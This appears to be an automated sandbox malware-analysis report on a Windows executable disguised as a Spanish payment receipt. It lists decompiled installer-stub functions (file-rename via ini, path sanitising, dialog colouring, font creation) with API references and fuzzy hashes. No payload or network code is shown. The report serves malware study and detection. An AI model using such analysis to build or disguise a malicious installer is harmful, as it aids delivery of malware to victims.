                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: Blass Setup$F
                                        • API String ID: 941294808-1670430719
                                        • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                        • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                        • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                        • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405EAB(void* __ecx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				long _t12;
                                        				long _t24;
                                        				char* _t31;
                                        				int _t37;
                                        				void* _t38;
                                        				intOrPtr* _t39;
                                        				long _t42;
                                        				WCHAR* _t44;
                                        				void* _t46;
                                        				void* _t48;
                                        				void* _t49;
                                        				void* _t52;
                                        				void* _t53;
                                        
                                        				_t38 = __ecx;
                                        				_t44 =  *(_t52 + 0x14);
                                        				 *0x7a55c0 = 0x55004e;
                                        				 *0x7a55c4 = 0x4c;
                                        				if(_t44 == 0) {
                                        					L3:
                                        					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x7a5dc0, 0x400);
                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                        						_t37 = wsprintfA(0x7a51c0, "%ls=%ls\r\n", 0x7a55c0, 0x7a5dc0);
                                        						_t53 = _t52 + 0x10;
                                        						E00406281(_t37, 0x400, 0x7a5dc0, 0x7a5dc0,  *((intOrPtr*)( *0x7a8a34 + 0x128)));
                                        						_t12 = E00405D51(0x7a5dc0, 0xc0000000, 4);
                                        						_t48 = _t12;
                                        						 *(_t53 + 0x18) = _t48;
                                        						if(_t48 != 0xffffffff) {
                                        							_t42 = GetFileSize(_t48, 0);
                                        							_t6 = _t37 + 0xa; // 0xa
                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                        							if(_t46 == 0 || E00405DD4(_t48, _t46, _t42) == 0) {
                                        								L18:
                                        								return CloseHandle(_t48);
                                        							} else {
                                        								if(E00405CB6(_t38, _t46, "[Rename]\r\n") != 0) {
                                        									_t49 = E00405CB6(_t38, _t21 + 0xa, "\n[");
                                        									if(_t49 == 0) {
                                        										_t48 =  *(_t53 + 0x18);
                                        										L16:
                                        										_t24 = _t42;
                                        										L17:
                                        										E00405D0C(_t24 + _t46, 0x7a51c0, _t37);
                                        										SetFilePointer(_t48, 0, 0, 0);
                                        										E00405E03(_t48, _t46, _t42 + _t37);
                                        										GlobalFree(_t46);
                                        										goto L18;
                                        									}
                                        									_t39 = _t46 + _t42;
                                        									_t31 = _t39 + _t37;
                                        									while(_t39 > _t49) {
                                        										 *_t31 =  *_t39;
                                        										_t31 = _t31 - 1;
                                        										_t39 = _t39 - 1;
                                        									}
                                        									_t24 = _t49 - _t46 + 1;
                                        									_t48 =  *(_t53 + 0x18);
                                        									goto L17;
                                        								}
                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                        								_t42 = _t42 + 0xa;
                                        								goto L16;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					CloseHandle(E00405D51(_t44, 0, "true"));
                                        					_t12 = GetShortPathNameW(_t44, 0x7a55c0, 0x400);
                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t12;
                                        			}



















                                        0x00405eab
                                        0x00405eb4
                                        0x00405ebb
                                        0x00405ec5
                                        0x00405ed9
                                        0x00405f01
                                        0x00405f0c
                                        0x00405f10
                                        0x00405f30
                                        0x00405f37
                                        0x00405f41
                                        0x00405f4e
                                        0x00405f53
                                        0x00405f58
                                        0x00405f5c
                                        0x00405f6b
                                        0x00405f6d
                                        0x00405f7a
                                        0x00405f7e
                                        0x00406019
                                        0x00000000
                                        0x00405f94
                                        0x00405fa1
                                        0x00405fc5
                                        0x00405fc9
                                        0x00405fe8
                                        0x00405fec
                                        0x00405fec
                                        0x00405fee
                                        0x00405ff7
                                        0x00406002
                                        0x0040600d
                                        0x00406013
                                        0x00000000
                                        0x00406013
                                        0x00405fcb
                                        0x00405fce
                                        0x00405fd9
                                        0x00405fd5
                                        0x00405fd7
                                        0x00405fd8
                                        0x00405fd8
                                        0x00405fe0
                                        0x00405fe2
                                        0x00000000
                                        0x00405fe2
                                        0x00405fac
                                        0x00405fb2
                                        0x00000000
                                        0x00405fb2
                                        0x00405f7e
                                        0x00405f5c
                                        0x00405edb
                                        0x00405ee6
                                        0x00405eef
                                        0x00405ef3
                                        0x00000000
                                        0x00000000
                                        0x00405ef3
                                        0x00406024

                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406046,?,?), ref: 00405EE6
                                        • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
                                          • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
                                          • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8
                                        • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
                                        • wsprintfA.USER32 ref: 00405F2A
                                        • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F65
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F74
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAC
                                        • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
                                        • GlobalFree.KERNEL32(00000000), ref: 00406013
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040601A
                                          • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                          • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]
                                        • API String ID: 2171350718-461813615
                                        • Opcode ID: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
                                        • Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
                                        • Opcode Fuzzy Hash: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
                                        • Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E004064F3(WCHAR* _a4) {
                                        				short _t5;
                                        				short _t7;
                                        				WCHAR* _t19;
                                        				WCHAR* _t20;
                                        				WCHAR* _t21;
                                        
                                        				_t20 = _a4;
                                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                        					_t20 =  &(_t20[4]);
                                        				}
                                        				if( *_t20 != 0 && E00405BA7(_t20) != 0) {
                                        					_t20 =  &(_t20[2]);
                                        				}
                                        				_t5 =  *_t20;
                                        				_t21 = _t20;
                                        				_t19 = _t20;
                                        				if(_t5 != 0) {
                                        					do {
                                        						if(_t5 > 0x1f &&  *((short*)(E00405B5D(L"*?|<>/\":", _t5))) == 0) {
                                        							E00405D0C(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                        							_t19 = CharNextW(_t19);
                                        						}
                                        						_t20 = CharNextW(_t20);
                                        						_t5 =  *_t20;
                                        					} while (_t5 != 0);
                                        				}
                                        				 *_t19 =  *_t19 & 0x00000000;
                                        				while(1) {
                                        					_push(_t19);
                                        					_push(_t21);
                                        					_t19 = CharPrevW();
                                        					_t7 =  *_t19;
                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                        						break;
                                        					}
                                        					 *_t19 =  *_t19 & 0x00000000;
                                        					if(_t21 < _t19) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				return _t7;
                                        			}








                                        0x004064f5
                                        0x004064fe
                                        0x00406515
                                        0x00406515
                                        0x0040651c
                                        0x00406528
                                        0x00406528
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406535
                                        0x0040653e
                                        0x00406542
                                        0x0040655f
                                        0x00406567
                                        0x00406567
                                        0x0040656c
                                        0x0040656e
                                        0x00406571
                                        0x00406576
                                        0x00406577
                                        0x0040657b
                                        0x0040657b
                                        0x0040657c
                                        0x00406583
                                        0x00406585
                                        0x0040658c
                                        0x00000000
                                        0x00000000
                                        0x00406594
                                        0x0040659a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040659a
                                        0x0040659f

                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                        • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                        • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-2482076612
                                        • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                        • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                        • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                        • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                        				struct tagLOGBRUSH _v16;
                                        				long _t35;
                                        				long _t37;
                                        				void* _t40;
                                        				long* _t49;
                                        
                                        				if(_a4 + 0xfffffecd > 5) {
                                        					L15:
                                        					return 0;
                                        				}
                                        				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                        				if(_t49 == 0) {
                                        					goto L15;
                                        				}
                                        				_t35 =  *_t49;
                                        				if((_t49[5] & 0x00000002) != 0) {
                                        					_t35 = GetSysColor(_t35);
                                        				}
                                        				if((_t49[5] & 0x00000001) != 0) {
                                        					SetTextColor(_a8, _t35);
                                        				}
                                        				SetBkMode(_a8, _t49[4]);
                                        				_t37 = _t49[1];
                                        				_v16.lbColor = _t37;
                                        				if((_t49[5] & 0x00000008) != 0) {
                                        					_t37 = GetSysColor(_t37);
                                        					_v16.lbColor = _t37;
                                        				}
                                        				if((_t49[5] & 0x00000004) != 0) {
                                        					SetBkColor(_a8, _t37);
                                        				}
                                        				if((_t49[5] & 0x00000010) != 0) {
                                        					_v16.lbStyle = _t49[2];
                                        					_t40 = _t49[3];
                                        					if(_t40 != 0) {
                                        						DeleteObject(_t40);
                                        					}
                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                        				}
                                        				return _t49[3];
                                        			}








                                        0x0040426d
                                        0x00404301
                                        0x00000000
                                        0x00404301
                                        0x0040427e
                                        0x00404282
                                        0x00000000
                                        0x00000000
                                        0x00404288
                                        0x00404291
                                        0x00404294
                                        0x00404294
                                        0x0040429a
                                        0x004042a0
                                        0x004042a0
                                        0x004042ac
                                        0x004042b2
                                        0x004042b9
                                        0x004042bc
                                        0x004042bf
                                        0x004042c1
                                        0x004042c1
                                        0x004042c9
                                        0x004042cf
                                        0x004042cf
                                        0x004042d9
                                        0x004042de
                                        0x004042e1
                                        0x004042e6
                                        0x004042e9
                                        0x004042e9
                                        0x004042f9
                                        0x004042f9
                                        0x00000000

                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404278
                                        • GetSysColor.USER32(00000000), ref: 00404294
                                        • SetTextColor.GDI32(?,00000000), ref: 004042A0
                                        • SetBkMode.GDI32(?,?), ref: 004042AC
                                        • GetSysColor.USER32(?), ref: 004042BF
                                        • SetBkColor.GDI32(?,?), ref: 004042CF
                                        • DeleteObject.GDI32(?), ref: 004042E9
                                        • CreateBrushIndirect.GDI32(?), ref: 004042F3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                        • Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
                                        • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                        • Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404B8D(struct HWND__* _a4, intOrPtr _a8) {
                                        				long _v8;
                                        				signed char _v12;
                                        				unsigned int _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				long _v56;
                                        				void* _v60;
                                        				long _t15;
                                        				unsigned int _t19;
                                        				signed int _t25;
                                        				struct HWND__* _t28;
                                        
                                        				_t28 = _a4;
                                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                        				if(_a8 == 0) {
                                        					L4:
                                        					_v56 = _t15;
                                        					_v60 = 4;
                                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                        					return _v24;
                                        				}
                                        				_t19 = GetMessagePos();
                                        				_v16 = _t19 >> 0x10;
                                        				_v20 = _t19;
                                        				ScreenToClient(_t28,  &_v20);
                                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                        				if((_v12 & 0x00000066) != 0) {
                                        					_t15 = _v8;
                                        					goto L4;
                                        				}
                                        				return _t25 | 0xffffffff;
                                        			}














                                        0x00404b9b
                                        0x00404ba8
                                        0x00404bae
                                        0x00404bec
                                        0x00404bec
                                        0x00404bfb
                                        0x00404c02
                                        0x00000000
                                        0x00404c04
                                        0x00404bb0
                                        0x00404bbf
                                        0x00404bc7
                                        0x00404bca
                                        0x00404bdc
                                        0x00404be2
                                        0x00404be9
                                        0x00000000
                                        0x00404be9
                                        0x00000000

                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BA8
                                        • GetMessagePos.USER32 ref: 00404BB0
                                        • ScreenToClient.USER32(?,?), ref: 00404BCA
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BDC
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                        • Instruction ID: 1a768e81d1a3c698b7e3ef6d626f5858b2063c99cedd32227338619671f62d57
                                        • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                        • Instruction Fuzzy Hash: 18015E7190021CBADB00DB95DD85FFEBBBCAF95715F10412BBA50BA1D0C7B4AA058BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E00401DB3(intOrPtr __edx) {
                                        				void* __esi;
                                        				int _t9;
                                        				signed char _t15;
                                        				struct HFONT__* _t18;
                                        				intOrPtr _t30;
                                        				struct HDC__* _t31;
                                        				void* _t33;
                                        				void* _t35;
                                        
                                        				_t30 = __edx;
                                        				_t31 = GetDC( *(_t35 - 8));
                                        				_t9 = E00402C15(2);
                                        				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                        				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                        				ReleaseDC( *(_t35 - 8), _t31);
                                        				 *0x40cdc0 = E00402C15(3);
                                        				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                        				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                        				 *0x40cdc7 = 1;
                                        				 *0x40cdc4 = _t15 & 0x00000001;
                                        				 *0x40cdc5 = _t15 & 0x00000002;
                                        				 *0x40cdc6 = _t15 & 0x00000004;
                                        				E00406281(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
                                        				_t18 = CreateFontIndirectW(0x40cdb0);
                                        				_push(_t18);
                                        				_push(_t33);
                                        				E004061A6();
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
                                        				return 0;
                                        			}











                                        0x00401db3
                                        0x00401dbe
                                        0x00401dc0
                                        0x00401dcd
                                        0x00401de4
                                        0x00401de9
                                        0x00401df6
                                        0x00401dfb
                                        0x00401dff
                                        0x00401e0a
                                        0x00401e11
                                        0x00401e23
                                        0x00401e29
                                        0x00401e2e
                                        0x00401e38
                                        0x0040258c
                                        0x0040156d
                                        0x00402a65
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • GetDC.USER32(?), ref: 00401DB6
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                        • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                        • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID: Times New Roman
                                        • API String ID: 3808545654-927190056
                                        • Opcode ID: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
                                        • Instruction ID: 4d28dda0b40ea0953a32cffe00044d8590db675546aa8caf17c1304664b83f42
